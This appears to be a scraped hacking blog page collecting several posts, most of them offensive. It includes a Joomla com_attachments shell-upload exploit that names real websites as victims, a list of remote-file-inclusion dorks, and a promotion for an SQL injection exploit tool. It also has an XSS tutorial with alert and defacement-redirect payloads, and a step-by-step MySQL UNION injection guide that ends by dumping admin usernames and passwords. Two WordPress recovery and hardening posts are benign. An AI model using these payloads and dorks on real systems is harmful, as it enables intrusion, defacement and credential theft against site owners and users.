Joomla Attachments Shell Upload

# Exploit Title: Joomla Com_Attachments Component Arbitrary File Upload Vulnerability
# Google Dork: inurl:”index.php?option=com_attachments”
# Date: 2013-07-09
# Exploit Author: Stars Hacking Team
# We Are: S3Ri0uS , Satanic2000 , NuLLeRRoR , Mohamadpk , blackc0der
# Email: Z3ro.Day@Hotmail.Com , Ste4ler_Mind@Yahoo.Com , Mr.Satanic2000@Rogers.Com
# Vendor Homepage: http://joomla.org
# Software Link: http://extensions.joomla.org/extensions/directory-a-documentation/downloads/3115
# Tested on: Lin
#######################################################################################################
# ~> ExpLoit <~ # # http://target/index.php?option=com_attachments&task=upload # # 1. Upload Your File . ! # 2. Find Your File in This Path: # http://target/attachments/article # 3. End 😛 # ######################################################################################################## # ~> DeMo <~
# http://www.iwalkforlife.com/index.php?option=com_attachments&task=upload
# http://www.iwalkforlife.com/attachments/article/0/stars.jpg
# —-
# http://www.lgbtpsychology2013.com/index.php/en/?option=com_attachments&task=upload
# http://www.sailors-club.net/index.php?option=com_attachments&task=upload
# http://www.project-establis.eu/index.php?option=com_attachments&task=upload
########################################################################################################
# Spt : Pejv4k , Skitt3r , Netw0rm , HUrr!c4nE , Kinglet , Skipp3r , AG , Amo Vahid , Ahmadbady , XzadX
# iskorpitx , HellBoy , Cyber-Terrorist And All My Best Friend :X

RFI Dorks

/_functions.php?prefix=

/cpcommerce/_functions.php?prefix=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/agendax/addevent.inc.php?agendax_path=

/ashnews.php?pathtoashnews=

/eblog/blog.inc.php?xoopsConfig[xoops_url]=

/pm/lib.inc.php?pm_path=

/b2-tools/gm-2-b2.php?b2inc=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/includes/include_once.php?include_file=

/e107/e107_handlers/secure_img_render.php?p=

/shoutbox/expanded.php?conf=

/main.php?x=

/myPHPCalendar/admin.php?cal_dir=

/index.php/main.php?x=

/index.php?include=

/index.php?x=

/index.php?open=

/index.php?visualizar=

/template.php?pagina=

/index.php?pagina=

/index.php?inc=

/includes/include_onde.php?include_file=

/index.php?page=

/index.php?pg=

/index.php?show=

/index.php?cat=

/index.php?file=

/db.php?path_local=

/index.php?site=

/htmltonuke.php?filnavn=

/livehelp/inc/pipe.php?HCL_path=

/hcl/inc/pipe.php?HCL_path=

/inc/pipe.php?HCL_path=

/support/faq/inc/pipe.php?HCL_path=

/help/faq/inc/pipe.php?HCL_path=

/helpcenter/inc/pipe.php?HCL_path=

/live-support/inc/pipe.php?HCL_path=

/gnu3/index.php?doc=

/gnu/index.php?doc=

/phpgwapi/setup/tables_update.inc.php?appdir=

/forum/install.php?phpbb_root_dir=

/includes/calendar.php?phpc_root_path=

/includes/setup.php?phpc_root_path=

/inc/authform.inc.php?path_pre=

/include/authform.inc.php?path_pre=

index.php?nic=

index.php?sec=

index.php?content=

index.php?link=

index.php?filename=

index.php?dir=

index.php?document=

index.php?view=

*.php?sel=

*.php?session=&content=

*.php?locate=

*.php?place=

*.php?layout=

*.php?go=

*.php?catch=

*.php?mode=

*.php?name=

*.php?loc=

*.php?f=

*.php?inf=

*.php?pg=

*.php?load=

*.php?naam=

all/index.php?page= site:*.ru

all/index.php?file= site:*.ru

Recover Your Hacked WordPress Website In Easy Steps?

WordPress is one of the most popular content management systems at present. However as a general law, the increasing popularity comes with a number of dangerous has gained attention of bad boys as well. There are so many people who are reporting the cases of hacked WordPress account on a regular basis. So I have thought of putting a complete guide to discuss how to recover your hacked WordPress.

Ways To Recover Hacked Account

Below is the perfect path to follow to get your hacked account back:
Backup – Even if your website is infected to a small extent, it is still very much necessary to secure the backup for your website before waiting for watching the things turning into worst. Don’t forget to take backup of your entire database and all files. You can also try for a faster solution by using BackupBuddy.
Change Login Details and Secret Access Keys – At the time you sense the hacking attempt, just try to login to your account to check whether your login details are still effective or not. If the username and password details are not yet changed then immediately change all the WordPress secret access keys in wp-config.php file and of-course your username and password.
Running Scanners – Running a scanner is also a very helpful step and comes at number 3 in this list. The scanners are basically used for identifying the compromises at the level of database. You can try out Cloud Sites WP Scanner plug-in or Sucuri Malware Scanner. After running the scanner you should make sure to move the next step stated below.
Installing Your WordPress Again – Next important step involves Deleting all the files existing in the directory of WordPress except wp-config.php file and wp-content directory. After that you need to download and install a totally fresh copy of WordPress. Now edit the wp-config-sample.php file by substituting the sample values by picking the actual database values from the wp-config.php file that you haven’t deleted as stated above. Now you can delete the present file and replace it with your own file.
Review Content Folder – Next task involved to check all the folders to find ones with any suspicious activity in your wp-content directory. So carefully analyze the folders content and remove any one that seems not to be belonging to you. If you later find that the folder was actually needed then you can get it back from your backup.
Analyze and Re-install Your Plug-ins – The next steps after completing with reviewing the folders’ content includes reviewing the plug-ins. Collect information about what plug-ins you are not using currently and uninstall them all for the time being. Now coming to all other activated plug-ins that you are using currently, deactivate and delete these plug-ins and then re-install and activate the active plug-ins.
Analyze Your Themes – Now the next thing that should be taken care of is the task of removing the extra themes which are not in use currently. Next task again involves reviewing your activated theme. Look through the PHP or Javascript code to find out any suspicious activity there. Most of the time hackers make such malicious changes in header.php or footer.php files.
Following this step by step guide can really help you a lot in getting your WordPress back. Also always remember to keep checking for the activities on your WordPress site. Also make it a habit to keep a time by time backup of your database. For more recovery details you can check onhttp://codex.wordpress.org/FAQ_My_site_was_hacked.

How to Secure before Getting hacked !

Every one is looking to make their blog looks secure and try to make their blog safe from hackers so that hackers can not take any kind of information from your blog. You can protect and increase security of your by doing following things :-
Chap Secure plugin
You can increase the security of your log-in by using Chap secure plugin, It helps in encrypting passwords by using CHAP protocol. It will help hacker to get in trouble.
Login Lockdown Plugin
This plugin helps a lot in stopping a hacker because if he is trying to play with your login screen then this plugin will limit hit after few wrong attempts.Just download the plugin and activate it. This plugin helps to secure your blog from newbie hackers. ;)
WP Security Scan
This plugin helps to check all the codes of your website from hacking Malware and scripts. It can find out which code or which file has virus in the blog.
Updating WordPress regularly
Try to upgrade the WordPress regularly as soon as any new version is launched. Most of the bloggers do not update WordPress and chances are huge that old WordPress version can get hacked.
Tac Theme Checker
You can install a plugin “Tac Theme checker” which can check your theme before activating it. It helps you to check the complete theme when you upload it into Dashboard and it helps to check the files completely in few seconds.
Make your security Bullet proof
You should increase your security more and more by adding some official steps from WordPress website and you can read them here http://codex.wordpress.org/Hardening_WordPress.
Theme of your Blog
Your theme plays an important part in hacking, If you are using some cracked version of theme then be ready to get hacked soon. Cracked themes often have codes which helps to get you hacked. I would suggest that get a proper theme from any web design company so that there is no chance to get hacked due to unethical themes.
I hope these steps will help you to protect from all the hack attempts. If you have any other method then do let us know in below comments. Thank you

sql poison 1.1- sqli exploit scanner+search hunter+injection builder tool

http://itsecteam.com/pic/pic1.jpg

 New Features:
“Look n Feel” is more attractive now.
Rich “Context Menu” items.
“Results” contain checkboxes to enable selection.
“Selected Dork” box is editable now for user convenience.
Built-in Browser for “Injection Builder” to check the impact of injection.
“Text Bucket” available for “Injection Builder” to save extra data.
“Insert Order By” button is added to “Injection Builder”.
“Internet Browser” with Snapshot and HTML DOM Tree.

 Bug Fixes:
It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay.
Progress bar for “Crawler” has been fixed. It will show correct progress now.
Error on importing file is fixed now. You can import files from other directories as well.
“Searchqu” shows invalid results. It is fixed now.

 Sql Poizon v1.1 – Sqli Exploit Scanner, Search Hunter, Injection Builder Tool

 [Image: scannert.png]
[Image: crawler.png]
[Image: injectionbuilder.png]
[Image: browsere.png]
[Image: sqlerrorlist.png]
[Image: aboutdx.png]

 Download:
[Image: injectionorange.png]Link

XSS : Cross Site Scripting Tutorial

Today I will be teaching you a very common vulnerability called XSS/Cross Site Scripting. Plus how to exploit it.

What is XSS, what can I accomplish with it?
XSS is common in search bars and comment boxes. We can then inject almost any type of programming language into the website. Whether it be Javascript, HTML or XML. XSS is mainly directed at Javascript injection. However, you can inject other languages which will be shown later.
Most people use it to display messages on the website, redirect you to their defacement and even put cookie loggers and XSS shells on the website.

What causes the vulnerability?
Poor PHP coding within text boxes and submission forms. They were too lazy to code it properly allowing us to inject strings into the source code, that would then give us the conclusion of what we put in since it’s also in the source code. They did not bother to filter what we type in. They allowed characters such as “>, “, /”, etc.

What types of XSS are there?
There are two types of XSS. Persistent and non-persistent. If you inject some code into the website and it sticks to the website (you leave the page and come back, and it’s still there) then it is persistent. That is good. When you get non-persistent it will not stick on the website, you will only see it once. With persistent XSS you can do much more, leavemessages, redirect them, etc. With non-persistent the most you can do is upload a cookie logger.

What will you be teaching today?
The basics of XSS and cookie logging.

How to test for XSS vulnerabilities.
To test if the website is vulnerable to XSS we want to go to a search box and inject some Javascript. We’ve found a search box and now we want to use Javascript to alert amessage so we can see if the Javascript was successfully executed.

**<*script*>alert(‘XSS’);
(remove every * )
We now see a pop up message on our screen saying “XSS”. This is what it should look like:http://img845.imageshack.us/img845/7924/xss1.png

In some cases, a message might not pop up. If it doesn’t work, check the source code and have a look at the output. Most of the time the error requires you to make a little change.

“*>*alert(‘XSS’);
(remove every * )
Okay, we have found out that it is vulnerable. We can now move on.

How can I deface a webpage with XSS?
I will be showing you methods for persistent, and non-persistent XSS.

Persistent XSS.
First I will be starting with persistent XSS. Since it’s persistent I want to redirect my victims to a deface page. We simply just inject this some more Javascript like we did before:
<*script*>window.location=”*http://yourdefacepage.com/index.html”;<*/script*>
(remove every * )
Remember, you can always alter the code if it doesn’t work.
You can do many things with XSS, you just need all the right strings. I’m only focusing on defacing, since most people just deface sites these days.

Non-persistent XSS.
Okay. Obviously we can’t redirect users with non-persistent. But with basic web-based programming knowledge we can make a cookie logger. We may also need advanced social engineering skills for people to open our cookie logger.

MySQL Injection : Step By Step Tutorial

Learn How To Hack Websites , Mysql Injection Step by Step Tutorial 

 
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on aMySQL Database.
mysql-logo.jpg (399×291)
Step 1:
When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ‘ after the number in the url. For example:

www.site.com/page=1′
If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the “order by” command. We do this by entering “order by 1–“, “order by 2–” and so on until we receive a page error. For example:

www.site.com/page=1 order by 1–
http://www.site.com/page=1 order by 2–
http://www.site.com/page=1 order by 3–
http://www.site.com/page=1 order by 4–
http://www.site.com/page=1 order by 5–
If we receive another MySQL error here, then that means we have 4 columns. If the site errored on “order by 9” then we would have 8 columns. If this does not work, instead of — after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3

We now are going to use the “union” command to find the vulnerable columns. So we enter after the url, union all select (number of columns)–,
for example:
www.site.com/page=1 union all select 1,2,3,4–

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7– If this is done successfully the page should show a couple of numberssomewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try…
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4–

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables–
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables–

Remember the “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()–
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()–
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the “username” and “password” fields, from table “admin” we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin–
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin–

Here the “concat” command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website